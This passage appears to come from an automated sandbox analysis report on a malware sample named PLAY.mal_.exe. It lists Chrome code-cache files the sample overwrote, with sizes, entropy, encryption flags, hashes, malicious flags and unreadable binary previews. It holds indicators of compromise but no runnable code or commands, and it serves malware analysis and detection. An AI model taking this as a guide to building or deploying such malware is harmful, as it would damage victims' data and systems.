        Preview:..(.J$......9dP;...+0.l.|....D;..:9.@&....G.?..z}!.D..@..?.....w..%]..6.....y..,.C./uL=..,(6.$..?...a.w..N......'.;.#.c..Z...<~Wp...}0....$....n2..4B....J..(fM.Y.L........+L.ay..nZ=|..^d........ ...pFh....Q+)[}R...............l..$I...i..i;.....r.f..6o0..#.!2...)V.:..VN^.h....er.?:)v.&[.,`.0x.......F~%]....V. y 3.<h.K.p.$e. ..X.YP..23..[....$..7~Q......*.~?.Q..H57..B..X.}..[.......O..c...S...z..g.^].;.9U(.=.....8..~..&{).a..A...?..4Q`j.v=..[...T..U.|.!.I>..........................._0...89.P.B.T..^.bW..BtQ.8..^..+q`..p....S........"s..=....g.U..J..Q....=~.z.4.g.$...8,B.ds?..mG.x...[..9W.8.*c...q..K.iOV.(5..d..:{..hE.8.......3.O{.0OK..7sW.....Rx....-,...=mh...<*+..O....T.A...4....a.*Y....B......r....._7m.N.;.....R.^.2....t.qf.Q.....kB.a./.6.:...OJ..\_z..2*.0.'.^r.+.M..ghX....B......g.........L.K...y.N..J^q1..|.u.t.|...S.EIxb.z....g./..S...x.q..1. #k.S..<f..gC.W.o....cN..}.w..a".A...U'..X.....5...V_!W;%/......../]..KLxj......!.....Bev~P...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\193710419aa3cc17_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4712
        Entropy (8bit):7.952755287782166
        Encrypted:false
        SSDEEP:
        MD5:637978061044B33C5053117A0DA109A4
        SHA1:A1AB3160B3A6F0E398280329D16F99F8D82D80A5
        SHA-256:4C9E3317E1360366C64B3811F5F29FAE2E68D1E06032B683869C762F54CCC5E0
        SHA-512:6D9814A813D26D553BE14B7729732D609BB95C4DB6C12875DB54BF425CD41C6E084F0CE7BECFE2F5C344D0AF5F21E105DA1C52AB562577C3EFB52306BCDC541D
        Malicious:false
        Preview:...F.u..,.i.....G.T..-.._h|.+..R.3i..V..:.Z.T5...8Y .......[.#.d9.....G.'.........&..6...V].r.=...#?.K.-.!._..&A.?:.u...<...G ....::.. .8e(~....?..<m.oDq/.?..`3.y...H7..o.M*.^nU....spom.x(.z..3.........(..e....TNH.....#Y.IS..r..~.K...F_OV).7.:.jo...B.,.....2.....(........dw........?O..R!K...vt..y.{...w.'g..-H..M.H.w..G..OW#..m.!..N..Vv......?...^N".....ag...&|...wPK..~.#.........UP......,...... .q.smz)zm...a..D~..hO.n.".u....V.LTW....[b'.,...zT.5.?...U&$.......]...8..0..4..TA8.p.6lv.:...*.7.%.......4.1.........K.l.18...Yv]..x....>..G...}............^..?_.... t......Zn....!.k..!i.y..C.0.Inc0...l.]....."..h......g..i..I...AY.Z..[h..\...../UU.a.2.7..i.C.O..O..".uU.S.w!".....#...+.[d..B.y..c...Vu...D.p.XT*..".@.a....ag...M..#1^.U...O.&.....*TBM..-F~...."...m.!+.[pl........6.P..gq.h..Y<.y.q[....R...x..c:....T.5.VrUx.s.Q...L..o...PYg.~.j..'.8A........R.P.`.#.K.#..0.kKS....._.....z..l.a.F....Ti..PiA?e..7.d....$p.+.AX..A.zI).....W.nN.y.03.].j.9>.2..{.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\1ba843d01a7fd21b_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):95080
        Entropy (8bit):7.9976679655388825
        Encrypted:true
        SSDEEP:
        MD5:044BD5FFDEFB9490287876999B8DF53F
        SHA1:EA9CA545237A8DD9DED3BCBC43C13751A0A92874
        SHA-256:BBA852889C3B748F83B2B53DA9DEF88FD780C90A5814CE35BC7981E3329A7B1D
        SHA-512:18781170DDCB1DAD709F128D80FF6F800D7E75EE31FFB8C881A96E3BAF402ABF4D9DA28CF16F1DA09D0267F46E753128A3065E917EEA3D3883EB2C71FB230A4C
        Malicious:true
        Preview:g.Z.".#.g.l.....Y......is.D{..N ..E.x.O.e..>9A.>..Z.D..n..z..'.U.)...1[O...5Z5....d..V.d8...s.W.$..2".1...-K].njF..=^..t./..tC.D$.!..9.(..L...1?0....#... ..$F.s-..B.V....(9&s.S.X.....&..Cx.T...v.89.na..k.W6."}X.2.\!}...[.=R..$...h4.L.B&..k......7..71*j.....8t...2.$$..V.+.e...Q.dn.(#1...F-..):d+V.YgM6.[......u..m3J6.[...^...b9...=.Xw.O...[.28<.../.v..i...&....d...?.6....6....]!R..19P.1~6.[o.(.d.]..k'.^/..4..m.....(.....'..'.8g.S....1..]Q.s.~.\.M.d...5oRw.(J...;.b'[...b.....B}.P...v...0..[.&...T0.. ....0......;7.*aDt>/G@.h.XN/*.V.....M?pZ....S'.........h......0|1..-?.y9..,!]......'7..S...d..\@.d.EyxBo....qV......N..`5.z..&`..x...".7.+...3T..U/(+...&6....?...N....................!6U..T1!D.\...".....r.%T=&..".M....N7.2./.".Gy...........w.P%.i].%$.P-8.e,.....+....^.u.X~....pt..dd...#......}.}.{.L..).k...K...z."c.?.c.B..z.).Iy....Q.........v.i.W.u%...........sc..9N)...0...u.*..ib.2..)....n..n."...PHR..@.dR.....<#....|...V7......o..........R

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\204be61fa3dd1aa2_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1528
        Entropy (8bit):7.8625444071139485
        Encrypted:false
        SSDEEP:
        MD5:6EB4DFD9B0D7A615B99347A6A3FFEC67
        SHA1:F23CF40B9374968EF02E047D5D9B22EE9579EC6C
        SHA-256:C619285D1458929D59F6E98DF3BE3AA72A264EA358DA758FBB31D8F56352341E
        SHA-512:4867FF283996217CB8C1785858B8ABD14CED73ADE69CF6F620CC7A91BD90BCCD38513A4BF4C816613D4E9CA5BEC5313128750CE760BF71F00254988C66C7133D
        Malicious:false
        Preview:y*.......{c.q..."..../....g..j...s.X.}=.....N.cJ9i..{...+|8:._r..`T.....u.rd.....74.\......d.r..@.>.!f\..L.xL.|.q$....@.@...cT<4+-.....bg..\o..Z37/o(.C;...::.E....}.}W.E.u..]..V.....E..Z_"...g......z.A.).......26.....Y!..o.....St|Q,9.!p-....d....k.~..=.Q..[...X%.....$AjQN..r"....l5.U>..(..P.eO.zZ.2.6J..G9v....Z@..3..$.l..o..R1.....q..9..)a..I.&T...8 ,....d..)...!................t.E.9....>.4UM.MC...1...G......F.*7..+W.;k...G.GI12!6......T..U.|.!.I>..........................q....S ...j..Y..a~KX.w...@9.2.At...v..c#.2.4.....nB............:..$....H..@.-c.-...$.?).....u...H..q.b...2h......:...D.2K+..b.>v.....A..p...S[...."............,......k..P.I...~.*.-=.....aqD8.d.Q.P%.&9iE=......9Z....r.oy........dLH.a..,..9..-.%|p..u..W7.1....X.4+[.&*....!.t.9.9.....!,...n.x.b.....XD..<T..T........la.....i....<.!..1G..i.o...l..o.0Sa.....W.X..i.DD`....S.YN.Z't..+d.>,[0..IYH.....`..........Y,..E>..l..t..C.d..X.a....hD....C.7\.iA.....XKG.......Vo..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\244f905c10de3c26_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.845638526176381
        Encrypted:false
        SSDEEP:
        MD5:D47536548E4475939B93F689E20A5A4E
        SHA1:F29D3B211B6FC17BB7F07A19F65D19370D084501
        SHA-256:F73380D121E2B5C0A2624FE3DD26935EE5AC7023C084759EC6D56D4D0BC8A58A
        SHA-512:F831DCE2806BD932D2F9B81FE7BA299F98FA0816F00687E70D34CA8E9CE03CEFA6004C86BA369049617D373D9ABA88B13F71AAD57484D461238719EB6F40AB19
        Malicious:false
        Preview:....Qy...X...(r.I....l..o|....g.U.:P..4D,.....a[j....}..\8`.F..oc........d.Q.L.!J\..?.;.v..h/...........^.....zo..5...K. ...ly2.U*z....;|h...k...:5SI].G.........5)..D..Rc.XR..r".......V0i.M&.N.}*...}.6`1xR....U..[N.......I.|]..(uBz...s..>6..n...NC......`u...........@r.N..}g.v...-_."........Q..a....L..|jI...y.^...Lc>..l...;.......M...ay....-.~&.09.E.....lC...T..U.|.!.I>..........................~..H.Y.>.;.~Y=B...6..4.&.P...d.|jc.,a.........S..f.@.P...N.j..K.0....2.)xy...O..M...`.[.Dqa...(\S.......f...W.<.C....h4.8.Tyr....M.....%!)f'6...M..*.a:......'.c...........O..+c..d/Yg. ..4.......y6>.;@.....S..L.....%..<......9... ..f.....Va..k.C.,\....-YR.HYp1.:..h?P.......#. ..E.?.t...p.?..].......E.....`(..Q.1.r....WsikXp,e.m!..!..#..0....B...iZ..s.kY..M$.....|....<Q*...K.H..%4.P..}..1...m..O.?z.6.....z..C....W.?..."~......NJ...6..-j..h4...{.....4.v..5p....rW..Ag.|&.....H|/.]v..a.VT..?..>.1....|.VS...ZG....o>%pz.Y.&.5.O....R.Y.,<.i l

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\25f13bc86c899fc9_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.829349863905568
        Encrypted:false
        SSDEEP:
        MD5:AD0C3A03EE2E2FE3A1BD60FD78B19478
        SHA1:A52D8AE31BA17FF28E336F776E9B0D0304BD2FF5
        SHA-256:17F8D9C10A6D1E898BBCDBDC1DAA3BBAA6D8F0DAE3BA82924EF4D4D7A53F2DB7
        SHA-512:4F7E2A22E5B40E980B3975A24E6A7E2EC6BF754211E6EA9E3DA37BEB0903B73C1898E720075003AEA159D6F2653A57239D52F742C560C0F88159D42DE0E12B80
        Malicious:false
        Preview:.5.....w.......(m...!...Y^..I...u..&.Ey<.v....*..G..o..V.....N..$....R'.T.R...\.00R.3..Th....h.:..).I"$..T..p.UK."..|..q..XU..;T...f............&..........J]......2.g..|X...R..O..\..?..{".J$..t.......B+...:.M.".....T..U.|.!.I>..........................K>S......A0...6....3....(....n..w..:P.6|o[N...z.Sf&.Bg.&a.....w.t.i....K......Q..Z.T..U..n@.;...D...7,X'.S...[&e7.n.....B.l..+.Y.a./..].k.l%..=....(....5c..-.i.Y....".,A].e....B.z..1..C..b.....B...c.Fq.)....^t.K..G...rf~....T.z<b...~b.(p..l..Jg..6R....n.t...m`.=...._.<.5Q..x....)y.....H.q,....;....g.e...."..L..C.<........,....&..|Y.I;._.6.............pY.5[..<6&.i..0..F..;.L....f...x..IZ...U...I. .L....5..U...0....}..?N#A.0.;jWa...?XJ.gu|...........l.pq...."...CJ..d.^.S-...w...2.....;..l...G.x.........r..=.V2x.F..n..eB..Z[.n~.-\l.{..F.~D..h"...F..........Y1U........'.....m...Bt..0G.k...3.W8A...........c.m.f..-9...60.=...R.".2..?.....P.....{...ee.[b.....w....[.k3.H...F_a...A....9.\.....w

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\2fc35d15f2eabeff_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):83448
        Entropy (8bit):7.9974077096670895
        Encrypted:true
        SSDEEP:
        MD5:06C56826466A022C8DE46EFD2B38B5FD
        SHA1:ABCDD59C35D2E213D7B77C4706A747DF52439851
        SHA-256:1CE34166919A450D7538E30E08B1736393286C908EF2EC59BCC6F98BE94915F5
        SHA-512:F7B19D01E99AE7E8A3DF863CFD2F16F1E4965763326AECAE3D9A16A64AB2D739FF034BDCA14C9FF92EA12E6BAECB66E4A5A6E121DD41B598B71E6F6386C55C4B
        Malicious:true
        Preview:r._k...7>..y........%..Q.^.y.....$.V%..,..c.S.\..~..&/#H&.K..I..I}."Y)...;0.....;...A`..~.........Vb....a...$.NJ.8!\.\.I.^......}m.5&.....*......|3=..z..^...i.......D.....Lp.HRI..l.....5....,.\..x......I.}.C.B........o.._..Y..[.s......e..p5.JT8..._<.9o.....o;D........P.../..`5.qp..c.vQ.k*{Q~..v.....[!.6p!........f...eH.Qp..*[~>.|..gB..T1.P...+.u(..!.K..~..X..<.'..........?9_E..,.;Z......d..9.X...........x....;..*Wr'.(._f:.....o.<a.&*B?oF0h....Yd.z...)0..I....g..".`..M..!....\....f."g.CS;G.....}zj..PO.....{......{........S..s'y....!..S...Q....3h.{..9.@v...D*....*.Mj.:>X..O....d.@.$z.......Sk.AB..1..l.7..X..'DK# K.9/.....aQ...a.fz.}S^.~..7L.}....>..t..}.1.H....z.......\x..}.8.e...o. .$k.[..K..eyv.\2.......7u...5.-..c..jy"Xb ..seX..`.\*...T..?..^..+.#Z....u...DO0.?.i..L...-."..@...._.Uf.r<...5....h.__[.X@..r2.....A..,.....k.....9n.6...r>.O.K.Qc..".K0I....c4...|"<K>....m..E8...Q....`DmI~-.dc........1.h.,.8....')...9.....2i.}ZK6...6F.ie..v...#.?B-

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\2fc3d3a085992c47_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):7848
        Entropy (8bit):7.97477242418478
        Encrypted:false
        SSDEEP:
        MD5:103638C2E0057FD754DFB4A76D03F7B4
        SHA1:FE54AF86373440E0828F97CD2BECF03705916567
        SHA-256:3069890F34FD1074EDF943F72B7BE63D0C87C4B32EF87B699B766BDC79870A3D
        SHA-512:4969634357165A9C1C252BD0DEC22A794EEF33DA84C5DC5033DD00CCCE0B8DE2C43682691388DB66148900C7B7CCFABD406D3DD972795B6226269487ACEA37A9
        Malicious:false
        Preview:NX..L...W.W......Scil..~B<...i......_@!.v^...'=1s.}6..B.'b....N..6...2.#.....J..&.7..(Y>........N.......-.c...+..\....Xc..pmy....l......P.hc...-My..#.\.5U=......tru.....e...u.b.........7p~.8.M.(..iC.9..-/$.7........"....oh.D..u...6....o...%..{.h%.0..|.i.^.x..#1...V.$...E..ln..W....N./.b..>~..q...v..][....O+]..w.g...".B...#.dIO.?E.]dA......[...n..1<|.3J.d.tQ...X\0~.....q....}.....z.h/(...{`"(...Q.i.O.dT..2...`p......j....T.H..|hM.Gp....4.m......j.X..e.X......{7C.'P|g.#...`...&....o.].d....w.1.S4[U.....R'....s$#....;.aH-...7tQ....i......J.sn..I......9a:hh...~.Y.w^3...h.....3...w....h.....^.Pz...}...s..`..i4...O..u.-.1)..3...4I^.._..<..".....>LR4....7*._.=d......n\......C.........F...!.../P....f6..M(..8.....|......e!^..Iw.. 5.H.;.......\.y.`4wO_.......9B.W.P...&....y&h4...t)...S:R...........a..lU$5.......E..9.Y.......Kr...C....(.#.....2h...-..G..'...O8..j9P.....[....O......NM'.Vo..Y....K............U.=...2t.i.0.\.ui.5.......uH.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1464
        Entropy (8bit):7.855736168668719
        Encrypted:false
        SSDEEP:
        MD5:B32FEF67122E41F607C8E21DFA42DFD1
        SHA1:3B414DB4E12502581ECD624AEDF5822D5401F2E9
        SHA-256:B59BCDBA8ED3BCAB21BAF5215CDE7EAD7575CED4613111E25B6AFE2BE29D93C9
        SHA-512:1B48CE3A0F9AE3FF88D2C1AFB502FEDBF210B324EB6ED53CA41B19D045395AC8D3957F71BB2857A7E800E25C54AF5178C29AAD6903FC766C0BA0FAEE20DCA68C
        Malicious:false
        Preview: ..h?.x...l..<.5.L...[q....s|Iq.T......<...5..T.8E<...,.."...\4TDWT...U<=..b..&..X.....xw78...X.....)s.c.o:A.&07..c.........S%..3A..R.2.i.......;...T:.?.5X..TP.F^....s........@...f...Y.|...%...S..7J..>....E.RX.`.E.Y6}....+4...].V...dS......6.2..S|.{O.[s...B....z;..G...y...7.J9.8.o.;..I.0.M..=....5...F`O..t...O8.IG_8w.gw..4.. ....n.:...1.h...S..%..-...yZ!..tW....tf...!...T..U.|.!.I>..........................e...R...y...x.4.`@8.q...b...do..+.AP.1.....y..g..... z.8..].I......N.C.%K.._...;...._.F.-3..........`.?.w.7..pi.0% .L..}.6.p...(..j.k..C.?.D.~.......aw.l..p..Gr......&._..F.B;.6....KK....M.g.8..p..= ne.o.J..5#w1...IQ...uE.{....T.z.EE....z@.:.(..EE. ..G..}$...S$.n.<.....Q.5.P.WP.Au.?..3..o.@.....Fl7..f.w0A)...3q.}..@....0{...........:[.....'..."8.3..=E..Tx....-4...F...1.d%............7..z..@......N.......k..q.H:l...<....A.j..........7O..C<z......9-.=.m.....6r.../...%.x.d.....S..o{..>....&lK}2O.;P...k.A.].......#.s..7rQ&^

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3653004befb613c5_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.838972462990837
        Encrypted:false
        SSDEEP:
        MD5:2CC2098C9BE4BBB84424127FDB5362CB
        SHA1:EC6793F197BF1CFD8125BBCD19A58C3049B83073
        SHA-256:3EF6011376BC76B43FE96CE80ED12F3B8C1CAAA2C70D1ECC3172845A74CFB80B
        SHA-512:280579059C16AAB0D9206E65EF80064CDEA3235E06D310EB3FB742DCA0029E6A635B981CA23CC0B8EF91A566CDBB011598D76F0CCA0D30655AF06376573F59F9
        Malicious:false
        Preview:7....T.......F.'.k.:R.%.....2......1......99H..e.:....B.B...{Y.&w...$..l>...W.PP.......jO"E..4..f......N.x.b...x.....%. N~qJ.?.(0..E..G.3.`...h...3.5.8..O.R...B.i...4.......'......[,.RJ..Q?d@...*'.8.w..$w.....T..U.|.!.I>............................C>.N`.....NO..:.z..$..*..U..!....M.:.+Tt..m.s....RC....{.Iw..v.=.J...K.....7FOd...._m.=....3.tN..:.c.l.fvwE.hd...(..-&...'0..X......[..mU..-X..`.l.S..HLmk<..D^.cy..a..Qd;...7;......E..1....|_0.z..!.x.6..[l.}.Y&..9o..K......%.b...m..........+P..."..J..<.u.L.E.!..g.....r\.Mo....ws>.|..Lo,.P.WO.G...D.w3~@a...f..g^..JA......m.w..Yn...f~.Uq..|...(.nUo..b..(....f#.Q.+..`.y .r....:.#..$Wp....K......M....V...u....wH=...%.1E..-T...L....i2.....]....[.......&.C#...8.R..c...>.ew}6...U................5.f 7A.-.....:....6D.j..U.$_..\UL.2..X.;O.:G.v...f...$<..B.....n......:x...%.G3..|.....A.d....n.>..t.4i_.U.2...K.+g...q..#Y....=...A.H.WDz...e..R...V.......j{......"..F...;}........._. .g....\

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\37c5525a0a82ad76_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.843176221285272
        Encrypted:false
        SSDEEP:
        MD5:006CFDF87B89FDB08EC32E78533A4248
        SHA1:6D628744338BE85A49F81D71FAF01D520B322BD8
        SHA-256:9D8CC0AD355A21EBD4D0608D8A5CBB31013A7A71AE9973870BCB1AFD98D65B79
        SHA-512:020DF9EE15464636DE18137805329031FEE7D3EE66D8703AFD599A236F1BEBD93D1A9CC94123EE18825D57CA77BCB261AD7665C14405184FF4FFE34221BF860F
        Malicious:false
        Preview:..z.Q1..O.A^..$<'[./tL.>..Q.:?....!.\.H....q....W.....@}=.....=)D....W..........sYy.[1.8.?.$`S+.H KP.....|q..C>.!AW,. ...O..cMw...Y...O...Wq3/.<.e...9V...o!.........g.\.u..ec.xM....v.....a..0.:..#|...... ...W...T..U.|.!.I>...............................%i.cZ.l..+..D..^....5.J....y......Z.4 ..&.w=./_.Hh-..[{..,./.m.h...S.+..r....n.<Vz.x....m&.+....$......T..G..~.....JR..FE..w&...~.L..@..M.M.k.y..Vz.G...j..1^W....O..T.}..9G.z_|(....P....b'qM..... .%..SJJX..K.....omO.CT.`2Uo_.V.....".GE...J..T..N.j..n..@.A.e..|.a.....2.l....(..z.>,.O..$...G.5.....mK...0>..........VmI.Y..K..l*....q...Y.k:+K.a...TF..x...&<.aW.......cc.IF...HG...ue!$,g..nF.Ar(.n..1....%..k..e.3........L.t.....n.,...L....WiE.6.TC/..g.....'..}%...2.....3.j}kY.:.u..;....B..n.:..y;..|.....NV.C.O....Q|...f.0.u.J)...p..Mja>..=.C...p..b..v.~9.D2@.5.JZ;t......'.d........+._.*d.0.$..(.F....._.......^....y6..r.)..b.K..M..<B.+..L.t....?-..(.......|.>N".'>...G......".}.1.5.pT..d.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\39208e3502e0f8fa_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):20200
        Entropy (8bit):7.989644177511951
        Encrypted:false
        SSDEEP:
        MD5:3BBE6CCE5627AEBFE3DD72240E5B0E20
        SHA1:A991A3CD73AAF066E5B06CFA8FC6EDABCEF5F45B
        SHA-256:D859A0FF97D6BDB6F2C079A8197D5B11984D12D629E136152DF22ACBE45D4B64
        SHA-512:D4473DAC5F4A2E8C900863852A576B3D87FE09C409DD41B85A4264168B60F8A65EFF39DC20D6A3CE4E7CA455350206FDF83BC2E6F458B3AFDF38EBA4EFF90C81
        Malicious:false
        Preview:t.....Q..A.../.g..\...Q..$H...I.#vO....)KMF#.&..s..Kw5ZM.!U...x~.B.............OM...;...bB.!f...jxz.e:c...C......Fnv0...Kw;./x.......F........[..._f..bu^},.....IcF...DJ...!.RV_M..........@.W..9b..o...nY.%....g`.;.7...28.....|.U..2h...*y.!._.f.X>u..?..W........d..#.u...f..?..yX.$o..Ei;.$..l.[F.@....aC..X....a..Q#..f...|..*Q..x..M(Ee......,......0.U.CJ.` .....'B.b...+Vz<gO6.)......%y...r.E.....eM=....].YWT,O.........i...t....?Z.V).......:Tf...F.Ou....J.i..F.#.\H..n....v..Jg.....W......DDC.Ql..UU.j7...[.P'".I:)dQ..]i)K....:6..\...Z.3...Y.l.w.R..by..,u.$..%..V.$.*Z=.......H~..>......fulv..u..0+..C......6.[...~0Q'9......7.....n.+$Im.aT..V...P.?9l..x.%q.7.?}+k.y.......9c..\.y.#q.'*`......4.D.....H'.(5)=..!@..[....aV'...1..E.,...x.z.D.B.~...JW..7z..../_......\S.r-.ru..!y..&wc..7.v.j..O....\&.C.z..K-E2..f..r2..f.V.0,.[x...M.=..Z..._w....{u...e..L...p.gk.X....h.T.........9.@j9.p.=*..6.........$......q.x...6.2.Gp7...1...&g..?"7.r1...q..@.>+....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3cad3a8253a7ad76_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.84032370514202
        Encrypted:false
        SSDEEP:
        MD5:7FE0B5DCADD8F737CAA188F1F7DF4A5E
        SHA1:CE166C85E42D7EA6974F5174FBB2F763C31799B7
        SHA-256:C6356D3E931ED5B5D0DCA81805258DBFF11626BCFB6526755703FF339558931A
        SHA-512:FAE37979364B19E1A185B898B471C6BFAEA91A3378E34CB600A81709C59DF5CBF9FC202EA3F05167D9D4300EACFFD7D01B4B7E0CAD3064AB5278A07FF0F8D975
        Malicious:false
        Preview:.W..h..'fKcU.1..'.'v.Y.L....E...u.....P.[vXacL.8..{.*.(.G..L5.........D...l.'..$........5...5|..B5P-..Z....#,./?....D....cyK..W....&>.......}.... E'CW...(Z[.x...,J.A!..<UwU...^..xj....7...(j.>..l.<.PV.+....bCf....|.v../..?.....8...0.hb..".o0>..SL;.../p.......O....0...Yj".X......7-..Y.....ySPZ...H2.~.B.j.....+.A3...m.X.>6.){.F...oOC.. .._E.....|..C..O...T..U.|.!.I>..........................bt.s.v5d.....1.Z.#d...!.=b.Gdn.(.:.........e..{_.."OJ....*L=.....a.o........hx.O;_.....l."..0.[.#.......o.....HOB..Is.C1."?.w...............4e...mW..0l..7.V.....Q.n[.."...H* C$...'....z.}..GA.#.|.'.lF..P.,..`.....).O........U..A..F..x....u.f.....3$...MK..K=.;.Y$..iN.....^....@..l%....i}.-Q,o...XQ...~......*....).E.......M./...=....O..B.F.CF,.y.........../....4P=+.di(&..P.so.Z.T........@.3Ij.|....>.i...B...,.zz...8a<O8~..H..A.P....r..7...ki.h!L.D.4.h..".Zs..$.OkS..1g......Q..y7........h&.......^. .j.....LSP..G.h8.$3.1yC.*.'.$7eI*y!.-....U....7k..<.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3dbe54b7c92541c6_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1320
        Entropy (8bit):7.859058110082449
        Encrypted:false
        SSDEEP:
        MD5:C3DEF02DABCDE5827E78ADBCB2274DBA
        SHA1:4A6438612E084C91D51E92FD627F0B96726DFF2E
        SHA-256:76132340B25723477E36D5DEC1A36725868AC93DFD7DA4B64EDA8CCC87B0D49D
        SHA-512:67B29C6189F6310E561019ABA15859A53BD25DD78D8ADA659A0E2747519C5B842570BB0FCC4322A0C7B9E60C882E37FF48C00FD2C70DC9CDDCD91E6DADF31489
        Malicious:false
        Preview:.p.z.....G.......cX./..` o......q.umR..kph.e...p....V.'. <.9.1l.C.WK.J..4||.._&9...<z`;..J..p...?6...$.....o.w..@...Mu.O..0..1\..........J...R......X..n....)vJ\1D.ot.4...RaBy.=....$.....g..9.J/.6"H.j...........i........8.+..O....Ii...(...%.}#......T..U.|.!.I>..........................bh.,.PKd.......y..u.<.w.\r.8.....o...1.W..:..<...itp%...z}./.~HRkg......y....7.,...9.........My7..LK..=f9oM.P.(....QK)U4..@;.....V..i\h..].&...VU..GC..>..`../_J9.....P.t.=..c....sT/...I.......o...-,8.2.z>...6.G..........$.*.Xz~Y.g.M.%......J>...z|...+^n....2.d.i..{.[:........Duu..Hl........?j.Yf._.&.V...m...E....fsN......u.....w.'....2.F.0...f5..Pwy.|.....ZH...F ...D...9fMfy...w.pl..~.h..Q..&(..H..,...2...~&j!5..(3.(..q..4.`~...?...iv..P.HZ...J...L..Y.K.|....pd.+1d.r...o.k*...j....a...?j...L.>..?..<.W..m]}.fC.(iDp.....VF... .`).......j....8.M4N'.......D.s.0|...!@w.vF..B|.....!....I'[.(3....T8.........X.......?...A.3....(.....8l....^...`_b........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\413a48146dfbead6_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1800
        Entropy (8bit):7.872555012266717
        Encrypted:false
        SSDEEP:
        MD5:DD425BF47FE122CF8847EEEAE4F7CE6D
        SHA1:EB55535F1256C10CBBEFAC4BA595EA055C227518
        SHA-256:7D647330A815BFB79ADE52099F8A6CB60A3BB3395AB2F834ED67A2EBB47ECB5A
        SHA-512:C4A96BC0B57565B8A288B9E9E849F7AC599902F94298D90DB8B3A1C515C8CF7BB726B6E55077B09F2C1BEBC06C83AB956A75C620B8C57226435FA0C8066C452D
        Malicious:false
        Preview:.Z.....x..A..=....kng..[.n..........y..T..."4.}..a....8".Z-.j.P~$.%.7...0.J.L2.>4...m.HN~.%.k.Ph1..K0..9,......z.I.....4.b.SWg......QQ9.I....&V.!.{=..6v.'x.3.%`..&.....J..,...f.<'_...D.s..m.*.i...*ci...QvF+u...o...q...,.d..=...r@...V@...J..[.l.......c6..b.'.=...1....T.Kh.....lG.@...dRx..._(.'..V3.$....S.`.f...1."$!.a.X...,......S..Z.........=.. ..Ms`A....$...m...,. ...P...@.;.#j..rc.K?......r..!.-G.o..&....T_..g.*{/3R..N.B.k.X..6.i.y:...n(.'Atlp."..)..^.........1.Q..N..x...W'....a......D.=...+@92;q.wStGo.+....gf.]...5PB.7.....$.J:v.,=....{K..c..A.E..dQ...t..TU1.X.....{{S.oZk....b....5P-\.*..V?...W...Ae{......P.-....e..G....8.....].u.... ..PM...._i*=-.......{l......T..H..U.i.......C.../.....|.J...T..U.|.!.I>..........................W...8-.yk^PB.S..W...6.l2.1S".el.+.$..r.b..8...~..../]Lz.. }:.8..~..[....Q;M.{P.dT..!K..U2o..U..{m...B...)../...[gL4cE....\....H...@].nn~.....e.[.h...)B=.....-.....`.Z..."k.[R.7e......r3..Y..uw....@..}............Rm.%_.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\4d1a34821fab0830_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):139224
        Entropy (8bit):7.998823135518446
        Encrypted:true
        SSDEEP:
        MD5:04AC7E65C7EA2660C22B3AE22ABEC12E
        SHA1:A76DB9B46A034A72F243C691D6F47A89F1843E0F
        SHA-256:F4220A5B846B92A3056A662B3ACF12E79E1D0C3887F82D38EFBDF8CE22E23F54
        SHA-512:A115F9C3DB64C20BBCD6DD82917BC73A186ED60DE5DE1235AFF999DAA0B59C3D5889F48DB280AA5CCAC141F27E9306D917A8647E7509CFA66A66E1A744CD0A5B
        Malicious:true
